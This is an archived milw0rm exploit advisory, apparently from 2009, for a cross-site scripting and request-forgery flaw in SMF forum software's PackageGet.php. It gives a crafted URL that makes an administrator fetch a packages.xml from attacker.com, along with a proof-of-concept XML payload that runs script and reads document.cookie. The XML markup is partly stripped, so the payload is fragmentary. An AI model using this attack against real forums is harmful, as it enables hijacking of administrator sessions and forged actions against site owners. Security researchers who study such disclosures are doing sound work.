Author: Xianur0 Vulnerable Version: All The Bug is located in the file: Sources/PackageGet.php Example: http://victm.com/index.php?action=packageget;sa=browse;absolute=http://attacker.com When the admin link between the SMF to load the file: http://attacker.com/packages.xml Save this file as packages.xml Xianur0 Was Here
SMF XSS PoC By Xianur0 alert('XSS')]]> Xianur0:XSMF SMF PoC By Xianur0 smfexploit.zip 0.1 Xianur0 alert(document.cookie)]]>
and generate the XSRF: # milw0rm.com [2009-01-26]